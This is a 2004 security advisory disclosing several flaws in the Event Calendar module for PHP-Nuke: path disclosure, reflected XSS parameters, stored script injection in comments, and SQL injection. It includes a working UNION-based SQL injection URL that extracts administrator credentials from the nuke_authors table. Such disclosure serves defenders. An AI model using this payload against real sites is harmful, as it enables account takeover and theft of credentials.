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[waraxe-2004-SA#038 - Multiple vulnerabilities in Event Calendar module for PhpNuke]


From: Janek Vind <come2waraxe () yahoo com>
Date: Tue, 16 Nov 2004 13:18:17 -0800 (PST)



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{                              [waraxe-2004-SA#038]   
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{         [ Multiple vulnerabilities in Event Calendar
module for PhpNuke ]      }
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Author: Janek Vind "waraxe"
Date: 17. November 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=38


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Module's Name: Event Calendar
Module's Version: 2.13 - March 16th, 2004
Module's Description: Provides an event calendar for
PHP-Nuke communities.
License: GNU/GPL
Author's Name: Original author - Rob Sutton.
Development continued by Holbrookau.
Author's Email: phpnuke () holbrookau net

Event Calendar - a module for PHP-Nuke.
Based on version 1.5 by Rob Sutton, the Event Calendar
found here is much updated
and features many improvments and add-ons. For
example, the administration area features
configuration via a graphical interface, posting of
events can be moderated and users even
have the option of adding comments to any event.

Homepage: http://phpnuke.holbrookau.net/


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This piece of sowtware has many security related flaws
due to poor user-submitted data
handling. 


A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "config.php":

http://localhost/nuke73/modules/Calendar/config.php

Warning: main(modules/Calendar/configset.php): failed
to open stream: No such file or directory in
D:\apache_wwwroot\nuke73\modules\Calendar\config.php
on line 11
Warning: main(): Failed opening
'modules/Calendar/configset.php' for inclusion
(include_path='.;c:\php4\pear') in
D:\apache_wwwroot\nuke73\modules\Calendar\config.php
on line 11
Warning: main(mainfile.php): failed to open stream: No
such file or directory in
D:\apache_wwwroot\nuke73\modules\Calendar\config.php
on line 14
Warning: main(): Failed opening 'mainfile.php' for
inclusion (include_path='.;c:\php4\pear') in
D:\apache_wwwroot\nuke73\modules\Calendar\config.php
on line 14
Warning: main(modules//language/lang-english.php):
failed to open stream: No such file or directory in
D:\apache_wwwroot\nuke73\modules\Calendar\config.php
on line 19
Warning: main(): Failed opening
'modules//language/lang-english.php' for inclusion
(include_path='.;c:\php4\pear') in
D:\apache_wwwroot\nuke73\modules\Calendar\config.php
on line 19


A2, A3 - full path disclosure in "index.php" and
"submit.php":

http://localhost/nuke73/modules/Calendar/index.php
http://localhost/nuke73/modules/Calendar/submit.php


B - XSS aka cross site scripting:

Examples:

http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss
code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss
code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss
code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss
code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss
code here]


C - script injection in calendar event comments:

It's serious bug - anyone can insert javascript
exploit code to event comments
and if user or admin will read it, javascript will
trigger and bad things can
happen - like cookie theft, arbitrary admin
operations, etc.


D - critical sql injection bugs in code:

If we take a deep look at source code, then there can
be found multiple sql queries,
where some variables, mostly "$eid" and "$cid" ARE NOT
surrounded with single quotes.
Therefore sql injection is possible. Further
exploitation will depend on database 
software and version. In case of the mysql version 4.x
with UNION functionality enabled,
arbitrary data can be retrieved from database,
inluding admin(s) authentication credentials.
As tradition, there is proof of concept:

----------------[ real life exploit ]---------------

http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT
%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1

----------------[/real life exploit ]---------------


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vendor contacted: 06. September 2004
Vendor responded: 06. September 2004
Detailed list of problems sent to vendor: 08.
September 2004

Since then no more response from software developer
and downloadable version
still unpatched.

For help with patching look @ here -
http://www.waraxe.us/forums.html


Additional recources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free proxy lists -
http://www.waraxe.us/forum/viewforum.php?f=21
Base64 online tool -
http://base64-encoder-online.waraxe.us/base64/base64-encoder.php


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna, icenix, g0df4th3r and
slimjim100!
Tervitused - Heintz ja Maku!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe () yahoo com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

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